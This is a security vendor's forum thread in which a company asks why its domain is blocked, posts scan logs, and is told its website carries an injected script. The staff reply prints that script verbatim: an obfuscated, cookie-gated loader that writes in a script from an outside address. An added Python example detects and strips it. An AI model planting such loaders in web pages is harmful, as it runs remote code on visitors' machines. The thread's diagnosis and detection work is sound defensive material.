Jouni Posted April 29, 2021 ID:1454001

Possible FP for hxxps://www.seclan.com (81.19.112.23)

Hello,

Our company has a problem related to Malwarebytes. We don’t know why our company websites are blocked in Malwarebytes?

Here’s a log-file from my computer’s Malwarebytes scan:

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 4/16/21
Scan Time: 3:10 PM
Log File: afe7a99a-9eac-11eb-a9ed-78acc0ae97b2.json

-Software Information-
Version: 4.1.2.73
Components Version: 1.0.1003
Update Package Version: 1.0.39465
License: Trial

-System Information-
OS: Windows 10 (Build 19041.928)
CPU: x64
File System: NTFS
User: JOHENT-Z400\root

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 377509
Threats Detected: 0
Threats Quarantined: 0
Time Elapsed: 6 min, 8 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0 (No malicious items detected)
Module: 0 (No malicious items detected)
Registry Key: 0 (No malicious items detected)
Registry Value: 0 (No malicious items detected)
Registry Data: 0 (No malicious items detected)
Data Stream: 0 (No malicious items detected)
Folder: 0 (No malicious items detected)
File: 0 (No malicious items detected)
Physical Sector: 0 (No malicious items detected)
WMI: 0 (No malicious items detected)

(end)

And here’s the information flag that we get when entering into any of our company websites:

Here’s the corresponding log-file:

Malwarebytes
www.malwarebytes.com

-Log Details-
Protection Event Date: 4/16/21
Protection Event Time: 4:29 PM
Log File: bed98e18-9eb7-11eb-8107-78acc0ae97b2.json

-Software Information-
Version: 4.1.2.73
Components Version: 1.0.1003
Update Package Version: 1.0.39465
License: Trial

-System Information-
OS: Windows 10 (Build 19041.928)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Program Files (x86)\Google\Chrome\Application\chrome.exe, Blocked, -1, -1, 0.0.0, ,

-Website Data-
Category: Trojan
Domain: zammad.seclan.com
IP Address: 81.19.123.72
Port: 443
Type: Outbound
File: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(end)

Here are the IP addresses of the sites:

ip=109.70.162.92&url=seafile.seclan.com
ip=81.19.112.23&url=www.seclan.com
ip=81.19.123.72&url=zammad.seclan.com
ip=109.70.160.99&url=smtp-auth.seclan.com
ip=81.19.112.26&url=kopano.seclan.com

It seems that every site, which is part of the seclan.com domain, is blocked. I can’t figure out why? Could you please tell me how I can fix this?

Best Regards,
Jouni Henttonen
Seclan Ltd.
Staff Solution Dashke Posted April 29, 2021 ID:1454011

Hello Jouni,

It seems that your website has been infected with a malicious script -

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

Can you check the source code and remove it, please?
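Added example, not part of the thread and not Malwarebytes' own tooling: one way a site owner could check page source for the `codes_iframe` wrapper quoted above, decode the base64 and %-escape layers to see which script URL the block loads, and strip the block. The function names and the sample page (built in code with a placeholder URL) are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote

# Marker comments that wrap the injected block in the script quoted above.
BLOCK_RE = re.compile(r"<!--codes_iframe-->(.*?)<!--/codes_iframe-->", re.S)
DATA_URI_RE = re.compile(r"data:text/javascript;base64,([A-Za-z0-9+/=]+)")
UNESCAPE_RE = re.compile(r"unescape\('([^']*)'\)")
SRC_RE = re.compile(r"""src\s*=\s*["']\s*([^"'\s]+)""", re.I)


def decode_loader(block):
    """Peel the base64 and %-escape layers; return the script URLs it loads."""
    urls = []
    for b64 in DATA_URI_RE.findall(block):
        try:
            js = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64: leave this block for manual review
        for escaped in UNESCAPE_RE.findall(js):
            urls += SRC_RE.findall(unquote(escaped))
    return urls


def scan(html):
    """Return (findings, cleaned_html) for one page's source text."""
    findings = [decode_loader(m.group(1)) for m in BLOCK_RE.finditer(html)]
    return findings, BLOCK_RE.sub("", html)


def make_sample():
    """Constructed test page: same wrapping as above, placeholder URL."""
    inner = '<script src=" http://injected.example/x"></script> '
    escaped = "".join("%%%02X" % ord(c) for c in inner)
    js = "document.write(unescape('%s'));" % escaped
    b64 = base64.b64encode(js.encode()).decode()
    return ('<p>before</p><!--codes_iframe--><script type="text/javascript"> '
            'var src="data:text/javascript;base64,%s"; </script>'
            '<!--/codes_iframe--><p>after</p>' % b64)


if __name__ == "__main__":
    found, cleaned = scan(make_sample())
    print("script URLs loaded by injected blocks:", found)
    print("cleaned source:", cleaned)
```

The match relies on the marker comments being present exactly as in the quoted script, so a file with no match is not thereby shown to be clean.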
Jouni Posted May 14, 2021 Author ID:1456840

Hello,

Now we have cleaned everything out that seems not belonging to our site.

BR Jouni
Staff Dashke Posted May 16, 2021 ID:1457176

Thanks Jouni, the block will be removed.

Have a wonderful day!
Jouni Posted May 16, 2021 Author ID:1457191

Great, thank you.

Thanks, same to you.

BR Jouni